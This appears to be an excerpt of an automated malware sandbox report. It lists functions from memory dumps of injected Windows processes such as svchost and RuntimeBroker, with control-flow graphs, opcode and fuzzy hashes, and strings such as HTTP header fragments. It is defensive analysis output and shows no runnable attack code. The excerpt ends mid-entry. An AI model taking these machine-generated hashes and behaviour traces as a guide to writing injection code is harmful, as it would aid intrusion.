                                                                                                                                                                                          • Instruction Fuzzy Hash: 6021F930B34C1D0BEB5CA27C98597A4F6E2E79C320F940295EA0DD36D4ED58CC8183C6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00010811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 11 10811-10846 call 1086e 14 10848-10851 11->14 15 108ad-108ae 11->15 16 108af-108b0 14->16 17 10853-1085c 14->17 15->16 18 108d0-108d7 call 108d9 17->18 19 1085e 17->19 29 108d9-1090f call 10cc4 call 114bc call 10643 call 10ce8 18->29 20 10860-10861 19->20 21 108c5-108cc 19->21 24 10863 20->24 25 108b9-108c2 call 11756 call 11e62 20->25 21->18 28 10866-1086f 24->28 24->29 25->21 32 10871-10897 28->32 33 1089e-108a4 28->33 45 10911-1091a call 11756 call 11e62 29->45 46 10939 call 1093e 29->46 32->33 33->15 51 1091f-10933 SleepEx RtlExitUserThread 45->51 51->46
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001C.00000002.2888229544.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 6daea8f8473804d12748bca0b7204fc4a623126665c209879b0ad2024dc0075f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8231B6724142046FEB017BB09D4AAFA7BACEF11310F044165BDC5DA0A7DEB449D5CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00220811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001D.00000002.2886726902.0000000000220000.00000040.00000001.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_29_2_220000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 9213b5a24b7572a0fa8275f44ed011a212179cfb3f58e45071e8f7335106e7b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: D531E8724202257FEB017FF0ADC6ABA77ACEF11300F040165BD85DA0A7EA744975CAB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 006E0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001E.00000002.2887284163.00000000006E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_30_2_6e0000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 57b2477187417a0fa26d9e778a8692fd47d65f2161f25521c5e1062ca1e8795a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD31E5720113846FFF417B719D86ABA37AEEF11300F00016ABD85DE1A6DAB44D95CAB9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00E60811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000001F.00000002.2886725458.0000000000E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_31_2_e60000_conhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 4e65f1ce295fa428a3da672e4fd0ef68577f9fce5ea97a4a2d9caff0e717d1c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 543129720802147FEF06BF70AD46ABB37ACEF51380F041165BD85EA0A2EA704D54CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00940811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000020.00000002.2886409384.0000000000940000.00000040.00000001.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_32_2_940000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 3f2886f6ec09ed34d49eaf7711265528a991098f11a0e572295590f38348433f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: C831E672010205AFEB017B709D86FBA3BACEF91300F400165BE85DA1A6EA7549A4CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00B00811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000022.00000002.2422738043.0000000000B00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_34_2_b00000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 738e6db485bacd31c5bfb57b6805020ea59ac34f98071cdae04e4e89ec52c087
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31C1720203046FEB017B709D86BAA3FECFF11300F4441E6BD85DA0E2EA7449648AB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0286093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 286093e-286095f call 2860cc4 call 28614bc call 2863cc0 8 2860967-2860989 0->8 10 2860af1-2860af2 8->10 11 286098f-28609d2 call 28609d9 8->11 15 28609d4-28609d5 11->15 16 2860a3d-2860a76 11->16 18 28609d7-28609e8 call 2863653 15->18 19 2860a3c 15->19 17 2860a7e-2860a80 16->17 20 2860a82-2860aae 17->20 21 2860aec call 2860af3 17->21 18->21 30 28609ee-2860a10 18->30 19->16 20->21 27 2860ab0-2860abc 20->27 21->10 31 2860ac1-2860ae5 27->31 30->21 34 2860a16-2860a3b 30->34 31->10 37 2860ae7-2860aea 31->37 34->21 38 2860a41-2860a76 34->38 37->21 37->31 38->17
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 666f1d83c93e6e90c6a8e0b59a0915f7aa07f5a7d724b8da872b7f184644d25e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD5192356442549FEB135F20CC89BA97BB8FF04744F0401D9BA49FE0D6DBB09594CA6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 028614BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 28614bc-28614df call 28614de 42 2861502-2861590 call 2861345 * 6 39->42 43 28614e1-2861500 call 2860c9c 39->43 43->42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                                          • Instruction ID: 09242cb909ce05c8386663cc7c04eae06bae2c523b38d4155683a79ddb5cdbc6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521FC764046149EDF03AF60C9CC8A673ECEF40704F49096A9989EF04AFA749154CEE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02861345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 59 2861345-2861352 60 28613eb-28613ec 59->60 61 2861358-286135e 59->61 61->60 62 2861364-286137a 61->62 62->60 64 286137c-286138f 62->64 66 2861391-2861398 64->66 67 286139b-28613ab call 2860e7c 66->67 70 28613ad-28613e2 67->70 70->60
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 81af63b3b150f58c9699f22beb827f2356ba015f504f613eba9638e408418da3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F21AE35A04216AFDF119EB8D948B6DBBB5AF04304F098215F959FF695D730A800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 028614DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 71 28614de-2861590 call 2863653 call 2860c9c call 2861345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                                          • Instruction ID: 6c4173c30b3f4b94f782e7bfe0c7a4aafbc802248f83db95d1a0019eda0938b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F811AD764045149EEF03AF64C5CC8BA73ECEE40704B49096A9D8AEF44AFE749154CFE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02863F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 90 2863f0d-2863f29 call 2863653 call 286379f 95 2863f3b-2863f66 call 2863f78 * 3 90->95 96 2863f2b-2863f39 call 286401b 90->96 109 2863f71 95->109 103 2863f76-2863f77 96->103 109->103 110 2863f71 call 2863f78 109->110 110->103
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 7d740c54ca76b50c5b23a0ddb8058a1065a441b0fe34852c3217d7d543167f75
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F08C3C588640AFFF403BB4AC4D62D32B9AF00B05F0404D0AA8AEE8D0CE3085508E72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02864674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 111 2864674-286468d call 2863a1c 114 286468f-2864698 call 2863a6e 111->114 115 286469d-28646cd 111->115 114->115 118 28647e7-28647ec 115->118 119 28646d3-28646f5 115->119 119->118 121 28646fb-2864720 119->121 123 2864722-2864737 121->123 124 2864738-286475a 121->124 123->124 126 28647bf-28647c9 124->126 127 286475c-286477e 124->127 128 28647e0-28647e5 126->128 129 28647cb-28647dd call 2863673 126->129 127->126 132 2864780-28647a2 127->132 128->118 129->128 132->126 135 28647a4-28647bc 132->135 135->126
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: c64ccaea70287e747866c4c5b566e60deb088b3db4161d02c9eaf71b8488a789
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA4164BA500208BFEF125F65CC48BEEBBBAEF80704F154059EA44EA254D7309654CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02864675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 136 2864675-2864680 137 286468b-286468d 136->137 138 2864686 call 2863a1c 136->138 139 286468f-2864698 call 2863a6e 137->139 140 286469d-28646cd 137->140 138->137 139->140 143 28647e7-28647ec 140->143 144 28646d3-28646f5 140->144 144->143 146 28646fb-2864720 144->146 148 2864722-2864737 146->148 149 2864738-286475a 146->149 148->149 151 28647bf-28647c9 149->151 152 286475c-286477e 149->152 153 28647e0-28647e5 151->153 154 28647cb-28647dd call 2863673 151->154 152->151 157 2864780-28647a2 152->157 153->143 154->153 157->151 160 28647a4-28647bc 157->160 160->151
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000023.00000002.2921684648.0000000002860000.00000040.00000001.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_2860000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: dc2a5234da75354acf6ed9f9fd8035f8988e787324178cb9ea38eb42ed547b26
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: B14152BA500208BFEF225F65CC48BEEBFBAEF84704F154069EA44EA254D734D654CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 02BB093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 2bb093e-2bb095f call 2bb0cc4 call 2bb14bc call 2bb3cc0 8 2bb0967-2bb0989 0->8 10 2bb098f-2bb09d2 call 2bb09d9 8->10 11 2bb0af1-2bb0af2 8->11 15 2bb0a3d-2bb0a76 10->15 16 2bb09d4-2bb09d5 10->16 17 2bb0a7e-2bb0a80 15->17 18 2bb0a3c 16->18 19 2bb09d7-2bb09e8 call 2bb3653 16->19 21 2bb0aec call 2bb0af3 17->21 22 2bb0a82-2bb0aae 17->22 18->15 19->21 29 2bb09ee-2bb0a10 19->29 21->11 22->21 27 2bb0ab0-2bb0abc 22->27 31 2bb0ac1-2bb0ae5 27->31 29->21 34 2bb0a16-2bb0a3b 29->34 31->11 37 2bb0ae7-2bb0aea 31->37 34->21 38 2bb0a41-2bb0a76 34->38 37->21 37->31 38->17
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 3db76c414472a3032659e6335f09e0faf399cb654bdf473c3ee1eaa2d9c4e214
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C51A1315442549FEB236F20CC85BBA7BB8EF05744F0405D9AA49FE0D6DBB09590CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02BB14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 2bb14bc-2bb14df call 2bb14de 42 2bb1502-2bb1590 call 2bb1345 * 6 39->42 43 2bb14e1-2bb1500 call 2bb0c9c 39->43 43->42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                                          • Instruction ID: d9007e701e61f5467eea8f5aa82ba0010ea1d627fcf27d83ea76a59388daa009
                                                                                                                                                                                          • Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0421FA72404614AEEF03AF60C9C88E673ECEF40704F4549AA9989EF049FAB09554CEE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02BB1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 59 2bb1345-2bb1352 60 2bb13eb-2bb13ec 59->60 61 2bb1358-2bb135e 59->61 61->60 62 2bb1364-2bb137a 61->62 62->60 64 2bb137c-2bb138f 62->64 66 2bb1391-2bb1398 64->66 67 2bb139b-2bb13ab call 2bb0e7c 66->67 70 2bb13ad-2bb13e2 67->70 70->60
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 3827e46dd769374e585e7034dbbadc5fa6cb912ff662c6d45e6aba785fd235ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2218E31904216AFDF12DE78C844BADBBB5AF04704F058255F959BB594D770A810CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02BB14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 71 2bb14de-2bb1590 call 2bb3653 call 2bb0c9c call 2bb1345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2bb0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                                          • Instruction ID: 56a2a84c558480c29dec51e6ae9fec31b8eadf728de8e8d02fdb99284b22d059
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68117472404614AEEF03AF64C5C88FA73ECEF40708B4549AA9D89EF449FEB09154CEE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02BB3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 90 2bb3f0d-2bb3f29 call 2bb3653 call 2bb379f 95 2bb3f3b-2bb3f66 call 2bb3f78 * 3 90->95 96 2bb3f2b-2bb3f39 call 2bb401b 90->96 109 2bb3f71 95->109 103 2bb3f76-2bb3f77 96->103 109->103 110 2bb3f71 call 2bb3f78 109->110 110->103
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000024.00000002.2922946963.0000000002BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
